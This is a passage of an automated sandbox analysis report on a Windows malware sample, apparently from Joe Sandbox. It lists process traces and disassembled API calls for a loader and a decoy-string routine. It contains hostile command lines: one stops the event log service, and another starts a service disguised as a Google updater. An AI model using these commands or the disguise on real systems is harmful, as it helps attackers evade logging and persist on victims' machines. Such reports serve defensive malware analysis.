Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop eventlog
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
Imagebase:	0x7ff6bfae0000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	14:47:24
Start date:	30/10/2024
Path:	C:\ProgramData\Google\Chrome\updater.exe
Wow64 process (32bit):	false
Commandline:	C:\ProgramData\Google\Chrome\updater.exe
Imagebase:	0x7ff757d10000
File size:	8'662'936 bytes
MD5 hash:	0F247FC98A73243773ED3614FFAD3118
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	66.2%
Signature Coverage:	5.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	78

Executed Functions

Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00966770), ref: 00419F3D
GetProcAddress.KERNEL32(74DD0000,009667D0), ref: 00419F55
GetProcAddress.KERNEL32(74DD0000,00971E80), ref: 00419F6E
GetProcAddress.KERNEL32(74DD0000,00971E98), ref: 00419F86
GetProcAddress.KERNEL32(74DD0000,00971F40), ref: 00419F9E
GetProcAddress.KERNEL32(74DD0000,00971E68), ref: 00419FB7
GetProcAddress.KERNEL32(74DD0000,0096E988), ref: 00419FCF
GetProcAddress.KERNEL32(74DD0000,00971D48), ref: 00419FE7
GetProcAddress.KERNEL32(74DD0000,00971E50), ref: 0041A000
GetProcAddress.KERNEL32(74DD0000,00971CE8), ref: 0041A018
GetProcAddress.KERNEL32(74DD0000,00971D18), ref: 0041A030
GetProcAddress.KERNEL32(74DD0000,009668B0), ref: 0041A049
GetProcAddress.KERNEL32(74DD0000,009667F0), ref: 0041A061
GetProcAddress.KERNEL32(74DD0000,00966870), ref: 0041A079
GetProcAddress.KERNEL32(74DD0000,009668F0), ref: 0041A092
GetProcAddress.KERNEL32(74DD0000,00971F28), ref: 0041A0AA
GetProcAddress.KERNEL32(74DD0000,00971F58), ref: 0041A0C2
GetProcAddress.KERNEL32(74DD0000,0096E9D8), ref: 0041A0DB
GetProcAddress.KERNEL32(74DD0000,00966590), ref: 0041A0F3
GetProcAddress.KERNEL32(74DD0000,00971D30), ref: 0041A10B
GetProcAddress.KERNEL32(74DD0000,00971D60), ref: 0041A124
GetProcAddress.KERNEL32(74DD0000,00971F88), ref: 0041A13C
GetProcAddress.KERNEL32(74DD0000,00971EB0), ref: 0041A154
GetProcAddress.KERNEL32(74DD0000,009665B0), ref: 0041A16D
GetProcAddress.KERNEL32(74DD0000,00971D90), ref: 0041A185
GetProcAddress.KERNEL32(74DD0000,00971FB8), ref: 0041A19D
GetProcAddress.KERNEL32(74DD0000,00971D00), ref: 0041A1B6
GetProcAddress.KERNEL32(74DD0000,00971CD0), ref: 0041A1CE
GetProcAddress.KERNEL32(74DD0000,00971DA8), ref: 0041A1E6
GetProcAddress.KERNEL32(74DD0000,00971EC8), ref: 0041A1FF
GetProcAddress.KERNEL32(74DD0000,00971DC0), ref: 0041A217
GetProcAddress.KERNEL32(74DD0000,00971EE0), ref: 0041A22F
GetProcAddress.KERNEL32(74DD0000,00971FA0), ref: 0041A248
GetProcAddress.KERNEL32(74DD0000,0096E0A8), ref: 0041A260
GetProcAddress.KERNEL32(74DD0000,00971DD8), ref: 0041A278
GetProcAddress.KERNEL32(74DD0000,00971F70), ref: 0041A291
GetProcAddress.KERNEL32(74DD0000,00966A10), ref: 0041A2A9
GetProcAddress.KERNEL32(74DD0000,00971DF0), ref: 0041A2C1
GetProcAddress.KERNEL32(74DD0000,00966C50), ref: 0041A2DA
GetProcAddress.KERNEL32(74DD0000,00971E08), ref: 0041A2F2
GetProcAddress.KERNEL32(74DD0000,00971F10), ref: 0041A30A
GetProcAddress.KERNEL32(74DD0000,00966990), ref: 0041A323
GetProcAddress.KERNEL32(74DD0000,00966A90), ref: 0041A33B
LoadLibraryA.KERNEL32(00971E20,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
LoadLibraryA.KERNEL32(00971E38,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
LoadLibraryA.KERNEL32(00971FE8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
LoadLibraryA.KERNEL32(00972048,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
LoadLibraryA.KERNEL32(00972060,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
LoadLibraryA.KERNEL32(00972030,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
LoadLibraryA.KERNEL32(00972078,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
LoadLibraryA.KERNEL32(00972090,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
GetProcAddress.KERNEL32(75290000,00966D30), ref: 0041A3EA
GetProcAddress.KERNEL32(75290000,00972018), ref: 0041A402
GetProcAddress.KERNEL32(75290000,0096C1B8), ref: 0041A41A
GetProcAddress.KERNEL32(75290000,00971FD0), ref: 0041A433
GetProcAddress.KERNEL32(75290000,00966BB0), ref: 0041A44B
GetProcAddress.KERNEL32(73B50000,0096EDE8), ref: 0041A470
GetProcAddress.KERNEL32(73B50000,00966A50), ref: 0041A489
GetProcAddress.KERNEL32(73B50000,0096EAF0), ref: 0041A4A1
GetProcAddress.KERNEL32(73B50000,00972000), ref: 0041A4B9
GetProcAddress.KERNEL32(73B50000,0096CC18), ref: 0041A4D2
GetProcAddress.KERNEL32(73B50000,009669B0), ref: 0041A4EA
GetProcAddress.KERNEL32(73B50000,00966CF0), ref: 0041A502
GetProcAddress.KERNEL32(73B50000,00973B10), ref: 0041A51B
GetProcAddress.KERNEL32(752C0000,009669D0), ref: 0041A53C
GetProcAddress.KERNEL32(752C0000,00966D10), ref: 0041A554
GetProcAddress.KERNEL32(752C0000,00973D08), ref: 0041A56D
GetProcAddress.KERNEL32(752C0000,00973BD0), ref: 0041A585
GetProcAddress.KERNEL32(752C0000,00966AF0), ref: 0041A59D
GetProcAddress.KERNEL32(74EC0000,0096EBB8), ref: 0041A5C3
GetProcAddress.KERNEL32(74EC0000,0096EA00), ref: 0041A5DB
GetProcAddress.KERNEL32(74EC0000,00973DB0), ref: 0041A5F3
GetProcAddress.KERNEL32(74EC0000,00966BD0), ref: 0041A60C
GetProcAddress.KERNEL32(74EC0000,00966C10), ref: 0041A624
GetProcAddress.KERNEL32(74EC0000,0096EE10), ref: 0041A63C
GetProcAddress.KERNEL32(75BD0000,00973B58), ref: 0041A662
GetProcAddress.KERNEL32(75BD0000,00966C70), ref: 0041A67A
GetProcAddress.KERNEL32(75BD0000,0096C328), ref: 0041A692
GetProcAddress.KERNEL32(75BD0000,00973D20), ref: 0041A6AB
GetProcAddress.KERNEL32(75BD0000,00973DE0), ref: 0041A6C3
GetProcAddress.KERNEL32(75BD0000,00966B50), ref: 0041A6DB
GetProcAddress.KERNEL32(75BD0000,00966AB0), ref: 0041A6F4
GetProcAddress.KERNEL32(75BD0000,00973CA8), ref: 0041A70C
GetProcAddress.KERNEL32(75BD0000,00973D80), ref: 0041A724
GetProcAddress.KERNEL32(75A70000,00966B90), ref: 0041A746
GetProcAddress.KERNEL32(75A70000,00973B28), ref: 0041A75E
GetProcAddress.KERNEL32(75A70000,00973D50), ref: 0041A776
GetProcAddress.KERNEL32(75A70000,00973D98), ref: 0041A78F
GetProcAddress.KERNEL32(75A70000,00973C90), ref: 0041A7A7
GetProcAddress.KERNEL32(75450000,00966CB0), ref: 0041A7C8
GetProcAddress.KERNEL32(75450000,00966BF0), ref: 0041A7E1
GetProcAddress.KERNEL32(75DA0000,00966B30), ref: 0041A802
GetProcAddress.KERNEL32(75DA0000,00973B40), ref: 0041A81A
GetProcAddress.KERNEL32(6F070000,00966C30), ref: 0041A840
GetProcAddress.KERNEL32(6F070000,00966B10), ref: 0041A858
GetProcAddress.KERNEL32(6F070000,00966C90), ref: 0041A870
GetProcAddress.KERNEL32(6F070000,00973C18), ref: 0041A889
GetProcAddress.KERNEL32(6F070000,00966CD0), ref: 0041A8A1
GetProcAddress.KERNEL32(6F070000,00966B70), ref: 0041A8B9
GetProcAddress.KERNEL32(6F070000,009669F0), ref: 0041A8D2
GetProcAddress.KERNEL32(6F070000,00966A30), ref: 0041A8EA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
GetProcAddress.KERNEL32(75AF0000,00973CC0), ref: 0041A939
GetProcAddress.KERNEL32(75AF0000,0096C378), ref: 0041A951
GetProcAddress.KERNEL32(75AF0000,00973C78), ref: 0041A969
GetProcAddress.KERNEL32(75AF0000,00973DC8), ref: 0041A982
GetProcAddress.KERNEL32(75D90000,00966A70), ref: 0041A9A3
GetProcAddress.KERNEL32(6FA80000,00973B70), ref: 0041A9C4
GetProcAddress.KERNEL32(6FA80000,00966AD0), ref: 0041A9DD
GetProcAddress.KERNEL32(6FA80000,00973B88), ref: 0041A9F5
GetProcAddress.KERNEL32(6FA80000,00973BA0), ref: 0041AA0D

Strings

InternetSetOptionA, xrefs: 0041A8F5
HttpQueryInfoA, xrefs: 0041A90C

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
